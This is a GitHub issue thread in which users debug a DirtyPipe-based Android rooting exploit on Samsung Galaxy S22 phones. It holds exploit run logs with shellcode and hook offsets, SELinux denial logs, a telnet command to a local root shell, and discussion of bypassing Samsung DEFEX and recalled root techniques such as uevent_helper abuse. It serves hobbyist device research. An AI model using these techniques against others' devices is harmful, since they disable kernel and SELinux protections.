elliwigy
commented
2 years ago Here is after a reboot with beta2 still.. trying beta3 now.. logcat4.txt
Open oakieville opened 2 years ago
elliwigy
commented
2 years ago Here is after a reboot with beta2 still.. trying beta3 now.. logcat4.txt
polygraphene
commented
2 years ago No modprobe output on the log. Very strange...
elliwigy
commented
2 years ago dirtypipe-android-1.0.3-beta3.zip
I added more log and setenforce 0 on startup-root. Try it. You don't need to edit startup-root.
Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat dirtypipe-android: 1 file pushed, 0 skipped. 21.1 MB/s (45296 bytes in 0.002s) startup-root: 1 file pushed, 0 skipped. 1.5 MB/s (1195 bytes in 0.001s) magisk/busybox: 1 file pushed, 0 skipped. 87.2 MB/s (2102536 bytes in 0.023s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 114.6 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 26.5 MB/s (2821955 bytes in 0.102s) Failed to set property 'a' to 'a'. See dmesg for error reason. Ignore device info. Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys stage1_lib: /system/lib64/libc++.so stage2_lib: /system/lib64/libldacBT_enc.so stage2_param_libname: /vendor/lib/libcamxifestriping.so d503233f PACIASP was found. Offset hook address by +4. Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd Empty space size: 2096 bytes Run index: 9 Stage1 debug filename: /dev/.dirtypipe-0009 Shell code size: 344 0x158 bytes It worked!
AUTH Press any key to continue . . . Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat dirtypipe-android: 1 file pushed, 0 skipped. 21.1 MB/s (45296 bytes in 0.002s) startup-root: 1 file pushed, 0 skipped. 1.5 MB/s (1195 bytes in 0.001s) magisk/busybox: 1 file pushed, 0 skipped. 87.2 MB/s (2102536 bytes in 0.023s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 114.6 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 26.5 MB/s (2821955 bytes in 0.102s) Failed to set property 'a' to 'a'. See dmesg for error reason. Ignore device info. Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys stage1_lib: /system/lib64/libc++.so stage2_lib: /system/lib64/libldacBT_enc.so stage2_param_libname: /vendor/lib/libcamxifestriping.so d503233f PACIASP was found. Offset hook address by +4. Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd Empty space size: 2096 bytes Run index: 9 Stage1 debug filename: /dev/.dirtypipe-0009 Shell code size: 344 0x158 bytes It worked!
AUTH Press any key to continue . . . PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 telnet: can't connect to remote host (127.0.0.1): Connection refused PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell b0q:/ $ getenforce Enforcing b0q:/ $ exit PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat dirtypipe-android: 1 file pushed, 0 skipped. 65.5 MB/s (45296 bytes in 0.001s) startup-root: 1 file pushed, 0 skipped. 5.6 MB/s (1195 bytes in 0.000s) magisk/busybox: 1 file pushed, 0 skipped. 109.9 MB/s (2102536 bytes in 0.018s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 115.6 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 45.0 MB/s (2821955 bytes in 0.060s) Ignore device info. Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys stage1_lib: /system/lib64/libc++.so stage2_lib: /system/lib64/libldacBT_enc.so stage2_param_libname: /vendor/lib/libcamxifestriping.so d503233f PACIASP was found. Offset hook address by +4. Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971 Empty space size: 2096 bytes Run index: 10 Stage1 debug filename: /dev/.dirtypipe-0010 Shell code size: 344 0x158 bytes It worked! Press any key to continue . . . PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> logcat5.txt
polygraphene
commented
2 years ago Could you run it on command prompt? Sometime Powershell do bad things.
polygraphene
commented
2 years ago AUTH message is very strange...
I have never seen that message.
polygraphene
commented
2 years ago I think I only see the logcat of second attempt of run.bat.
elliwigy
commented
2 years ago C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat dirtypipe-android: 1 file pushed, 0 skipped. 29.7 MB/s (45296 bytes in 0.001s) startup-root: 1 file pushed, 0 skipped. 1.3 MB/s (1195 bytes in 0.001s) magisk/busybox: 1 file pushed, 0 skipped. 118.0 MB/s (2102536 bytes in 0.017s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 106.9 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 24.7 MB/s (2821955 bytes in 0.109s) Ignore device info. Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys stage1_lib: /system/lib64/libc++.so stage2_lib: /system/lib64/libldacBT_enc.so stage2_param_libname: /vendor/lib/libcamxifestriping.so d503233f PACIASP was found. Offset hook address by +4. Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971 Empty space size: 2096 bytes Run index: 12 Stage1 debug filename: /dev/.dirtypipe-0012 Shell code size: 344 0x158 bytes It worked! Press any key to continue . . . C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat dirtypipe-android: 1 file pushed, 0 skipped. 34.6 MB/s (45296 bytes in 0.001s) startup-root: 1 file pushed, 0 skipped. 1.7 MB/s (1195 bytes in 0.001s) magisk/busybox: 1 file pushed, 0 skipped. 116.2 MB/s (2102536 bytes in 0.017s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 112.1 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 33.7 MB/s (2821955 bytes in 0.080s) Failed to set property 'a' to 'a'. See dmesg for error reason. Ignore device info. Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys stage1_lib: /system/lib64/libc++.so stage2_lib: /system/lib64/libldacBT_enc.so stage2_param_libname: /vendor/lib/libcamxifestriping.so d503233f PACIASP was found. Offset hook address by +4. Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd Empty space size: 2096 bytes Run index: 12 Stage1 debug filename: /dev/.dirtypipe-0012 Shell code size: 344 0x158 bytes It worked! id AUTH Press any key to continue . . . C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>
elliwigy
commented
2 years ago I think I only see the logcat of second attempt of run.bat.
it was twice.. I run logcat then run.bat then when its done and doesn't do anything I run it again and it crashes.. same output.. @oakieville can you try it on your S22?
polygraphene
commented
2 years ago If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.
polygraphene
commented
2 years ago Second run without reboot always fail, because after the first run the libs are not restored properly. Can you upload logcat when only run once?
oakieville
commented
2 years ago dirtypipe-android: 1 file pushed, 0 skipped. 58.6 MB/s (45296 bytes in 0.001s) startup-root: 1 file pushed, 0 skipped. 2.4 MB/s (1195 bytes in 0.000s) magisk/busybox: 1 file pushed, 0 skipped. 150.3 MB/s (2102536 bytes in 0.013s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 139.8 MB/s (672928 bytes in 0.005s) 4 files pushed, 0 skipped. 1.0 MB/s (2821955 bytes in 2.714s) Failed to set property 'a' to 'a'. See dmesg for error reason. Ignore device info. Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys stage1_lib: /system/lib64/libc++.so stage2_lib: /system/lib64/libldacBT_enc.so stage2_param_libname: /vendor/lib/libcamxifestriping.so d503233f PACIASP was found. Offset hook address by +4. Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd Empty space size: 2096 bytes Run index: 5 Stage1 debug filename: /dev/.dirtypipe-0005 Shell code size: 344 0x158 bytes It worked!
beta 3 stopped there for me
modprobe-payload: Successfully set permissive in logcat
adb shell getenforce Enforcing logcatbeta3.txt
oakieville
commented
2 years ago stat: '/dev/.dirtypipe-0005': Permission denied
polygraphene
commented
2 years ago Thanks. There are similar logs as @elliwigy provides:
03-29 09:01:47.097 16957 16957 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 09:01:47.100 1194 1194 E audit : type=1400 audit(1648569707.097:246): avc: denied { search } for pid=16958 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100 1194 1194 E audit : type=1400 audit(1648569707.097:247): avc: denied { execute } for pid=16958 comm="modprobe" name="startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100 1194 1194 E audit : type=1400 audit(1648569707.097:248): avc: denied { read open } for pid=16958 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filteredAccording to this log, kernel module was successfully loaded and set permissive.
polygraphene
commented
2 years ago Can you run adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 on another command prompt, while run.bat prompt untouched?
oakieville
commented
2 years ago telnet: can't connect to remote host (127.0.0.1): Connection refused
however this device is not physically connected to my pc it is shared remotely
not sure if that matters
oakieville
commented
2 years ago Seen permissive in logcat got excited for a minute even with only permissive i beleave i can do my main goal
polygraphene
commented
2 years ago Yep. I think we are nearly in the goal (permissive + root shell).
I built the version to completely set permissive. (getenforce will output Permissive) dirtypipe-android-1.0.3-beta4.zip But perhaps still we can't get root shell.
polygraphene
commented
2 years ago I think we are blocked by some security mechanism by samsung. I will check kernel source after tomorrow.
Thank you for testing for a long time today.
oakieville
commented
2 years ago adb shell getenforce Permissive well look at that
elliwigy
commented
2 years ago If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.
lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..
That said, I am no expert by any means but unfortunately there isnt many devs working on USA/Snap model Samsungs for a while now lol.. Maybe some other devs for other devices can help, there has to be a universal method.. too bad fire30 won't release his methods 🥱
You are pro in my book and appreciate your help.. We are so close and I bet its something simple we are missing I bet.. Is there any other way besides Telnet?
One root method back on S8 days that worked (there were a few exploits I daisy chained) that even chainfire was surprised worked is we had an su binary in system/xbin but couldnt execute it and one day I was messing around and typed "adb shell setsid su" and sure enough it opened a root shell lol.. or another time I used uevent_helper and pushed a script there that was executed by the kernel and installed root for me.. or another I used a qti_init script on param that executed by init when setting a prop value via setprop or even cmdline injection I found that passed properties via bootloader by changing the serialno lol.. point is, there has to be something we can use :-)
oakieville
commented
2 years ago adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however
polygraphene
commented
2 years ago If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.
lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..
Thats' great! Do you have experience about DEFEX? I have found an explanation for DEFEX. It possibly prevent our startup-root from executing. Any idea on how to disable/bypass DEFEX? We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.
I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common
adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however
How did you launched telnetd? from normal (non-root) shell? If so, it is expected behavior.
polygraphene
commented
2 years ago Can you run dmesg command on adb shell? Kernel log might help to debug the issue.
oakieville
commented
2 years ago Yes shortly ill run it unfortunately i dont know DEFEX, I do have kernel source downloaded
oakieville
commented
2 years ago If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.
lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..
Thats' great! Do you have experience about DEFEX? I have found an explanation for DEFEX. It possibly prevent our startup-root from executing. Any idea on how to disable/bypass DEFEX? We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.
I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common
adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 r0q:/ $ connected but not root it is permissive however
How did you launched telnetd? from normal (non-root) shell? If so, it is expected behavior.
Yes normal shell as no root shell was presented (maybe i did something wrong but seems to ran correctly)
elliwigy
commented
2 years ago If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.
lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..
Thats' great! Do you have experience about DEFEX? I have found an explanation for DEFEX. It possibly prevent our startup-root from executing. Any idea on how to disable/bypass DEFEX? We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.
I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common
adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 r0q:/ $ connected but not root it is permissive however
How did you launched telnetd? from normal (non-root) shell? If so, it is expected behavior.
I honestly didn't think they were still using defex but back on Oreo it was a simple hex patch that bypassed it in the kernel.. magisk automatically patches it to my understanding..
maybe can use another location shell has access to such as
/data/user_de/0/com.android.shell/files
Which is the path for /bugreports
Is also where bugreports are created/stored.. Not sure if it's a "safe place" or not by defex standards.. Magisk is sometimes executed from /data/adb which of course need privs to access it
elliwigy
commented
2 years ago Either way, we know its possible since fire30 was able to get a root shell on p6 and s22 devices.. he uses an app however so maybe he gets around it somehow by using the apps directory instead of data/local/tmp? Maybe using termux or something like andronix to run linux within termux can help?
elliwigy
commented
2 years ago If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.
lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..
Thats' great! Do you have experience about DEFEX? I have found an explanation for DEFEX. It possibly prevent our startup-root from executing. Any idea on how to disable/bypass DEFEX? We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.
I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common
adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 r0q:/ $ connected but not root it is permissive however
How did you launched telnetd? from normal (non-root) shell? If so, it is expected behavior.
would we use startup-root to edit code or need to build kernel module to do things?
polygraphene
commented
2 years ago It is possible to (temporarily) bypass DEFEX by utilizing the paths other than /data/local/tmp, but ultimately, kernel solution to completely disable DEFEX is inevitable. Given that we already have kernel arbitrary rw, the solution will be straightforward like binary patching in kernel module.
Honestly, I'm not interested in bypassing/disabling DEFEX. Because it is samsung specific and I don't have the device.
Why not learn C language and kernel development to complete the work? @elliwigy
elliwigy
commented
2 years ago I do know some C code and def. know kernel development.. Also, I am not sure Defex is the cause as I haven't seen it referenced anywhere in logs for example. So essentially a root shell woulld be nice then I can work on other things but simply don't have the time to learn a new language in detail due to my regular job unfortunately
elliwigy
commented
2 years ago What are all these things?
|b0q:/ $ cd /data/local/tmp
b0q:/data/local/tmp $ ls -al
total 2781total 2781
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 \r\n\ can1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\n:\ can1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\nnt
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 \r\r
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\r\n\
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\r\n]:\ cant
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 \r\r\nant
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\r\nt
drwxrwx--x 3 shell shell 3452 2022-03-31 02:36 .
drwxr-x--x 6 root root 3452 1969-12-31 19:13 ..
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 127
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 :
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1223]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1239]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1347]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1949]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [196]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1984]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [201
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [2618]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [2619]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [2998]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [30
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3174]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3384]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3424]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3790]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4160]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4241]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4244]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4628]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4641
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4771]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4797
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4888]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4964]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4967]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [49871
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5001]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5052]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5170]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5398]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5421]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5462]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5563]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5759]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5919]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6288]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6353]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6460]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6464]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6554]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6564]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6587]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [6619]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [6905]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [7191]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [7403]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [7751
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [8293]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [8319]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 \r\n\ can1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\n:\ can1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\nnt
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 \r\r
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\r\n\
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\r\n]:\ cant
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 \r\r\nant
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 \r\r\nt
drwxrwx--x 3 shell shell 3452 2022-03-31 02:36 .
drwxr-x--x 6 root root 3452 1969-12-31 19:13 ..
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 127
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 :
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [1
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1223]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1239]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1347]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1949]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [196]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [1984]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [201
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [2618]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [2619]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [2998]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [30
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3174]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3384]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3424]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [3790]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4160]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4241]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4244]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4628]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4641
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4771]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4797
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4888]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4964]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [4967]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [49871
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5001]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5052]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5170]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5398]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5421]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5462]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5563]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5759]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [5919]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6288]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6353]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6460]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6464]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6554]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6564]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:06 [6587]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [6619]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [6905]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [7191]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [7403]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [7751
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [8293]:
-rw-rw-rw- 1 shell shell 0 2022-03-29 22:07 [8319]:
xcainiao
commented
2 years ago I build mymod.ko with s22 kernel. It too large
du -sh mymod.ko 432K
polygraphene
commented
2 years ago What are all these things?
|b0q:/ $ cd /data/local/tmp b0q:/data/local/tmp $ ls -al
I have never seen that... Seems the result of pasting some log output to adb shell. Or bug of run.bat?
polygraphene
commented
2 years ago I build mymod.ko with s22 kernel. It too large
du -sh mymod.ko 432K
That is the output before stripping debug info. Check ./out/(devicename)/dist/mymod.ko file instread.
oakieville
commented
2 years ago i think im confused when is startup-root and by what i ask due to it doesnt seem to run at all i added a line to echo hello to a file in /data/local/tmp no file is made i also removed all code from it and nothing seems to change at all
polygraphene
commented
2 years ago startup-root is launched here
modprobe process is running on root and selinux is already permissive after the line syscall(__NR_finit_module, ...).
So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.
I think DEFEX prevents startup-root from launching.
oakieville
commented
2 years ago Ok i wasnt sure if issue was do ti running it from /data/local/tmp
oakieville
commented
2 years ago the beta4 here is the source on page same as that or its different
oakieville
commented
2 years ago beta4 gives permissive however compiled from source does not not sure if source is different or issues in compiling
oakieville
commented
2 years ago i also get this when compiling make: Circular mymod.ko <- mymod.ko dependency dropped.
xcainiao
commented
2 years ago I build mymod.ko with s22 kernel. It too large du -sh mymod.ko 432K
That is the output before stripping debug info. Check ./out/(devicename)/dist/mymod.ko file instread.
file in ./out/(devicename)/dist/mymod.ko is 92k ...
oakieville
commented
2 years ago i didnt build mymod.ko i use one thats in the source
elliwigy
commented
2 years ago i didnt build mymod.ko i use one thats in the source
I think hes asking his own question as he compiled it but it was toolarge apparently so his is dif. than yours
elliwigy
commented
2 years ago startup-root is launched here modprobe process is running on root and selinux is already permissive after the line
syscall(__NR_finit_module, ...). So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.I think DEFEX prevents startup-root from launching.
Wouldn't we see DEFEX in the logs though? pretty sure in the past it would log any violations blocked by DEFEX similar to selinux denials..
Also, if it was being blocked wouldnt it still be able to launch a normal uid reverse shell without root privs?
And the ls -al I showed earlier is what I find in data/local/tmp after running run.bat (and even switched to linux and ran run.sh) when it says it worked but fails to launch a reverse shell.. might be the reverse-fifo?
elliwigy
commented
2 years ago startup-root is launched here modprobe process is running on root and selinux is already permissive after the line
syscall(__NR_finit_module, ...). So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.I think DEFEX prevents startup-root from launching.
This isnt from my device but here is an example of what it would look like in logs if defex was blocking something:
[ 21.151486] defex: safeplace violation [task=init (/init), child=/root/cbd, uid=0]
elliwigy
commented
2 years ago could it be that vendor_modprobe doesnt have capability of launching data_shell_file on data/local/tmp dir?
ayload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42 03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:265): avc: denied { search } for pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered 03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:266): avc: denied { execute } for pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered 03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:267): avc: denied { read open } for pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
